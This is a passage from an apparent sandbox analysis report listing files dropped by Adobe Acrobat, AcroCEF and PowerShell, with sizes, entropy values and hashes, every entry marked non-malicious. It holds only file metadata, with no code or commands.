SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.3931364965759965 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJM3g98kUwPeUkwRe9:YvXKXIoJImGRsdTeOPGMbLUkee9 |
MD5: | 4A7D1225B9B270F561E6136B4865826A |
SHA1: | EAA99E2CE8E2D9EDF72F7FAD70A4B3A11C0D3395 |
SHA-256: | 0FCFCCDB3F0E7910C1F5A30B2E411E6D1D466FA7592FE5D2630871179BB25554 |
SHA-512: | 5200A27AD0C8190DD1CE7806A09A50D4658C05DA4A9AEA57C3836413EB6EF7E57BAD5C65B7FE6740B08C3229ECD79AA95428D404F34C65C9DF3E986004D4608B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.332822973514685 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJfBoTfXpnrPeUkwRe9:YvXKXIoJImGRsdTeOPGWTfXcUkee9 |
MD5: | 09115ABA151F10537F7E44E54CB635D5 |
SHA1: | 842E330E77C6DB85040122FD300726CF30E7B34F |
SHA-256: | AC751F6F90D0251D8B8C245120B9E1E17656A9DD9A2A504EFC09F7636D1964F3 |
SHA-512: | B01E3812CD94B1417C41351518E276A69C479C27E9365CABE7EE66E8A9B9317CE63A38C518BBF8949B7A8D2469047129FC8F61C36210C747088E8BA7EB70513A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.311713826125442 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJfBD2G6UpnrPeUkwRe9:YvXKXIoJImGRsdTeOPGR22cUkee9 |
MD5: | 6545ACA886FEB63ECDF9E72D17F78C9C |
SHA1: | 4CC5B99EA2F08A4827D853E466870E59B0903C09 |
SHA-256: | 1A3E80A10F0CBAE5923632CB45EA67D73CC5156EFE0F70C769C69956885A5F25 |
SHA-512: | 83BB49104511A3E07AA61B0A0C1A9C0DD5CE275168F2D234CF447D92A283B406F04FF0AAB6E4B75BBD084D5209278F5F91AF4A86056408145D1CBD917870DE88 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.38105947026621 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJfPmwrPeUkwRe9:YvXKXIoJImGRsdTeOPGH56Ukee9 |
MD5: | 2F71D7B03DD9B58308642813521C7E0C |
SHA1: | 413A6570C2285E2687C44FEBC39AEE7E6E73BBA6 |
SHA-256: | 150D45040D0FBFCA3B4CF46E5D534EE44C6591887DA835E0C83964845757E42F |
SHA-512: | 0F689F7131DBB0CF788563FFD5673CAED52ADD7245840E2CFE0CB144D84EBA0E4EBD6B5EF4332A31BE4FF530E6C6A30345CC519EB9172C7F65D235A8B3611AD6 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.69580089207369 |
Encrypted: | false |
SSDEEP: | 24:Yv6X8mqmeOUpLgE9cQx8LennAvzBvkn0RCmK8czOCCSd:Yvk5ePhgy6SAFv5Ah8cv/d |
MD5: | 6B74C3026AA4426BB37184AD3F4D42F9 |
SHA1: | FD9CDDA439432CA3B4B513792A49B1419F76D39B |
SHA-256: | 8635E3D999ACC5183FCEBF2A1AB49A9F24070049B66BA5183A689BC8ADFF321D |
SHA-512: | C97ADFD477D0934931C97887ED43DA4D41311D15186AECDE944B282DDA6D3541EFF76A87340F159F04413C7D7E75624238D0FA44E7B4627A3FC020A697D62BB9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.319331819522851 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJf8dPeUkwRe9:YvXKXIoJImGRsdTeOPGU8Ukee9 |
MD5: | 5F1E17E66F8D27E062C7FE897283339A |
SHA1: | 2DBD5E97A0E15C9352A00FF0CF035AC142606FEB |
SHA-256: | B78254EED93878617EF0E8214C64244488FC3D178670450AC6998721785B3295 |
SHA-512: | 964C07D68FE01AFCF8AB448217648CB9B0A376E7F136730A78BA836722CBDDC7F1717EA8BA2411795E5D38532BD8B4B5E5BE4020440724D425A3D832B97EECFD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.323633637339876 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJfQ1rPeUkwRe9:YvXKXIoJImGRsdTeOPGY16Ukee9 |
MD5: | A1BB9BF722190C0A92EF439965C60394 |
SHA1: | 1A8527A8C3392FAC7D2E2073781F8C1030BD82D7 |
SHA-256: | DBD3A6E97A49C75CB28AA9391FDB0D8A4966AD59D01B04EFFBDCEE138FB78E2A |
SHA-512: | 893643FA49B797C2656FF5BD41D85137F7EEC780FEAC4D669D63F42AFC6504631B6DFD98426D4522875A6D03767EDE670F93454B9A225667C477C73C35EF35CF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.337737170453589 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJfFldPeUkwRe9:YvXKXIoJImGRsdTeOPGz8Ukee9 |
MD5: | 8C6F765EFD8EF699EAF7F19FD1E2E0B4 |
SHA1: | 7A88AD63E36A82FD52C43FFE97806E63AA0310C2 |
SHA-256: | 949199C7F651DA61CDBA3A9BCACC8E6D8096CF061161380A300093A4194E43CC |
SHA-512: | 7277CE5C9581222C322F92BF1815BEC24879AB0112DD3CFF588773C4B75297C2EDC78A419B443ECAD2240A56094974E312E1884101B2A7955E945DBC17598AB9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.344630003259763 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJfzdPeUkwRe9:YvXKXIoJImGRsdTeOPGb8Ukee9 |
MD5: | F66AFCF556892A0AE938BF0BFE112310 |
SHA1: | 3C0C1880898616E05B97D3D4BD9AAECD7CC94FA3 |
SHA-256: | 95FEE01512B52E5F9C38567B124CA7A870E9C375FE2D82D2FCCA95C4315749FA |
SHA-512: | 6DD175570AE92104A671CF9A88F0C94F7329C946837FC9B1A4B0F3A8232A28141101F98E830AFAA9066564EDCD22A9A995EAC34972E771C32F4754DCEF7A022B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.325798307604547 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJfYdPeUkwRe9:YvXKXIoJImGRsdTeOPGg8Ukee9 |
MD5: | 6496F387949C8EEEF9A66EFB6CFA05C0 |
SHA1: | 40698E2497253977B7189039A7E4E951AE7AF581 |
SHA-256: | B03A5B58ECA747869C8CF9CA1DB4B4A9DA38F4209F975A937F8709DEFC68E6D8 |
SHA-512: | E052D9377E2A44BC485FA68CE8D09640D3E1EFE13720B26147676B6396DB0D313FF683B86C769E48CA8E13AEC5EBFB7AF9FC0983C915570F1D3D3A4DA3420CE1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.311985174450798 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJf+dPeUkwRe9:YvXKXIoJImGRsdTeOPG28Ukee9 |
MD5: | 944FCFAC473C8EADC2E8AB2C3B06DC2B |
SHA1: | 8D807986FC6DD99A686399A47FE961A268A35568 |
SHA-256: | 467002F7EC0E2B3ED8622200B823FFC34187FE2656B88918D50D519D795ED741 |
SHA-512: | B8F47007CF11708A77DBD65D2BB98708EDFA478CA5266F8C707EAE896DC4DE42DAB6CFA616D7A7BA0C095B6243C65986D96FD3948E7E0AB25C87C5A733F0381E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.309168097322366 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJfbPtdPeUkwRe9:YvXKXIoJImGRsdTeOPGDV8Ukee9 |
MD5: | 39A84496CD409E23BBE1985014FFA25B |
SHA1: | 0AA67B665EFA58645759197DD85EC4A305E814BE |
SHA-256: | 3F17BBCCD8D91C31022D65ED8BB46D583569B469F60A1E26940BF58E11304E6F |
SHA-512: | 349303CBDFD4D36831210B4B6FF78D6F8C81BBD9129D83652FD48221DBC441D9C0364E582D3521C5BD401F542FFEA096EDC8C032C0F4524E6AF56D01F70F978F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.314176637061706 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJf21rPeUkwRe9:YvXKXIoJImGRsdTeOPG+16Ukee9 |
MD5: | 5E83D4FB415DEB328F88D2C4574802A8 |
SHA1: | 2F7B14C4DB4249FDDCE667B816ADEC43EB7EB810 |
SHA-256: | A332FCB2AA52E9B2DB595362701E0B1064901A2EB3DC3791BD531C833E878130 |
SHA-512: | 04E0C64C1263DA1629DCA878661C0C658AE7410C500F90CE4C9F322CBBA76202561517120FA8CD25A8E7FAD89B988B23C6200F6EF983E18AC7B4BB1A3DCBA7A5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.669472489153074 |
Encrypted: | false |
SSDEEP: | 24:Yv6X8mqmeOQamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSd:Yvk5evBgkDMUJUAh8cvMd |
MD5: | D5D01F90F33295BDC58E2CDC83929D6D |
SHA1: | 481F4D284FC5FA8BCE3D27DEEF7D6F1C7C488F3F |
SHA-256: | 379F320D911563A951DEF0989577E8E4EA617B2D58E3E572782F6730546708BE |
SHA-512: | 8F07D530F1448C1ACC2262234E3DEB0266BF216265780E8BA889228CAF1576B58782C4A4237C640E82A5FAD5B46AA879644D99EACF14F8D4583359E95C3128B7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.2892964355874 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJfshHHrPeUkwRe9:YvXKXIoJImGRsdTeOPGUUUkee9 |
MD5: | 4E29E7D6E8B48E764973882F8DAF7091 |
SHA1: | B5B774CC762A9766AAED69ED4C02799AB90EF3C4 |
SHA-256: | 1E53CE7C14BCE8837FA95DDA309F227806461519A6A0033937851230683FFD7F |
SHA-512: | D7D7E96D885F2D0BC06D602CE1722305ABC4FB2E496A757F12B27011E0585F3929F58CB7E932F0F08CB27CB742C7CC8B2C8654F71DA27FB39B116C475803E992 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.304424302190302 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJTqgFCrPeUkwRe9:YvXKXIoJImGRsdTeOPGTq16Ukee9 |
MD5: | 64576EE96B1F7766BC806F33A6C845DD |
SHA1: | A0209913F2E04630AB237B65D0F68EE4437D6F36 |
SHA-256: | 7CD7B90620FDDE3E217F39D0439D14811E1F0145E100FA4672583E6EB36852A6 |
SHA-512: | E227B3B4B18DD7E58B9F6EEB2462305B6BCE5C891EE0EC91C35E26DF39CFAC000C4BEAF10233074E1654319688F7686F772D0AF56010C454BADAD0113D91E452 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.139764172702512 |
Encrypted: | false |
SSDEEP: | 24:YMV+EwaTaymc5Fl+edf3BWg5g0jGTj0Ss/h82w7Z2LSeCDEZ8f5zx3xX54x9/u4Z:YfVAdf5RGftBlwJ8fdx9qx9v |
MD5: | 442BC461DF71F314FB1A3C1EFABCC4C6 |
SHA1: | 248D3198A707427B8009E8198134F6AEB5CB4F0A |
SHA-256: | 8E7039B87B7FCCFE91BB4E0BBC4A961390E4D4A1EAC9A3B630FE22F09C116969 |
SHA-512: | B9D87E3FD7E9FD3148C327C9ED29EBDFD3646736BA615946AAB62BBD25ADD9908D4A9F7C7D65A3409262866CC940B5319B04E6E8724B74E4ECE6D82F036A8216 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.455169935568881 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsOlm:lNVmsw3SHtbDbPe0K3+fDZd0 |
MD5: | 239DB7E016214E28A147E9C52FDFCD62 |
SHA1: | BACFD25EF4CBEF21B6A44E3F1C0DFE843EF18271 |
SHA-256: | 5EB6240BBDB7034D87C3CCEA47F3781C2D2A73F4E30ED7BFD9BFD8371E1795A6 |
SHA-512: | 810309909417FD445C4F88BB44B89C081BBAB449D3C1550F0781C122443E5097BCC50D6E05900E2F5B91CD41DAF62CCFFA14870253B51C0780A7507F5D5DFD85 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.9574767813513845 |
Encrypted: | false |
SSDEEP: | 48:7MorvrBd6dHtbGIbPe0K3+fDy2ds/5qFl2GL7ms6:753SHtbDbPe0K3+fDZdAKVms6 |
MD5: | 74EC1C5B42F8FC17828078CC20925FC9 |
SHA1: | 8E7FEDAD897CECE13D345A56CB07AFBB8597940B |
SHA-256: | 2DE2EE26C6B45F779611660E645B488DC48265A8DCF247C2CEC72F0DFDA7E461 |
SHA-512: | 5803F270D756E71E6DC188855EE69F1B15337130DE7322CDADFE4B6DC89B5620925FDFF4188F30B2C5908C58E9F532A25737CB9DCAA473B6DFFAFF1CAE9FDD1E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgLtvSe5ksUQIAYnn6IZ6rAqmeTYyu:6a6TZ44ADEZKeVYn6eHFeTK |
MD5: | 93F62E68EEEC7D62DCECC8AAE87AD0B7 |
SHA1: | E29C684074AD834771B88BCE3D709F71B610A82D |
SHA-256: | C1D1B1D7D460EC5A0166634498DEFF47ED4CBCC8CDA46813B5A8D3BE53422966 |
SHA-512: | A3683CEF715564478465F07EE0A31A5882F850F721AE0B853F0FAD60C337D1E723E1FC96326923F5DEE3817D8A975F2B0871E5B3D84D9675E47D74732C4ED346 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulxmH/lZ:NllUg |
MD5: | D904BDD752B6F23D81E93ECA3BD8E0F3 |
SHA1: | 026D8B0D0F79861746760B0431AD46BAD2A01676 |
SHA-256: | B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2 |
SHA-512: | 5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.480679440204275 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88Clqlf9:Qw946cPbiOxDlbYnuRKd9 |
MD5: | 9BB3CD31FAF6AC82809BDD0D723ADD51 |
SHA1: | 807C2D7E9686232AC6F290EE00A7B9ED9605AC2C |
SHA-256: | A0CA3E3C8AB5840A117D4A9C6952CE38807B210BFBC6E20D257D3B28B8322CA0 |
SHA-512: | 2748F759243E32933BC154E1C4642BD49EA88EBD67AA7AC45B196DB29F114028549D2EF7B99F4337AE54271ED919945523F9177ED44032EDDA58D88C056B432C |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-11 00-19-59-743.log
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.386483451061953 |
Encrypted: | false |
SSDEEP: | 384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID |
MD5: | F49CA270724D610D1589E217EA78D6D1 |
SHA1: | 22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3 |
SHA-256: | D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D |
SHA-512: | 181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.331289095933771 |
Encrypted: | false |
SSDEEP: | 384:q7Xy2mfIZbQItG8s6UCVQWvVsVcVJVlggAUzfIGsaWcWoep7Z4Iv1QcrlMloApr6:aX3i6Dw |
MD5: | ECE2F15CDD29CFC7B776B6B7817BD408 |
SHA1: | 536FB36D1101C82FFE065629B6DD2F32264967CA |
SHA-256: | 868349F0D5CA0AF10027694F0E89C567AF20B5CD29A7B95B4A24DBE334591697 |
SHA-512: | CB40198C08A79D424A15C2A40E9FADA4D04AC91FFD229D762874C9CF1EC21CD18A4C31D429303AEC94B6E5486F2D662BCDC235B578EBE5F4EF6C9DC81DB16811 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 35721 |
Entropy (8bit): | 5.412067449102394 |
Encrypted: | false |
SSDEEP: | 768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRVK:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gR6 |
MD5: | 9A5ECE0887B551F55F669A86BB15EEE4 |
SHA1: | 1831C57BBDFF92705660CAA6BAACC9E7783B5D95 |
SHA-256: | 9FBF890A3EED3401AF7C4AD42E0C66E3FD5F9BB7464DEA31B2963E2F190F451D |
SHA-512: | B5E37F23A5CB5B16C7CE500122D738A5CCEB852808E7B6463C37047AAE78B5E28056FBD9486E65B643D095BDECFB4BA1C19BA445B1B0A05DFF3A4745E7B71662 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/VRbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oXGZnYIGNPJF:tRb3mlind9i4ufFXpAXkrfUs0qWLxXGY |
MD5: | 9543A6C1DE815E938F6AA0F90F2EF0C6 |
SHA1: | 62B527E0463D71548862DE000950E638F3721582 |
SHA-256: | 8A4B4F588D79D2AF9E617936932D8264DF9017D80A68F8D39E5EA36B14D76F1D |
SHA-512: | 50A26B895BA1F40B2ADE59996A1A89EBAFE67CB9F7B4F3A029382B6966E75F8BAD3551D25F29391C58A7EDC206F7DAF1D07F68F5E458E3A5D02556EACA377B0D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
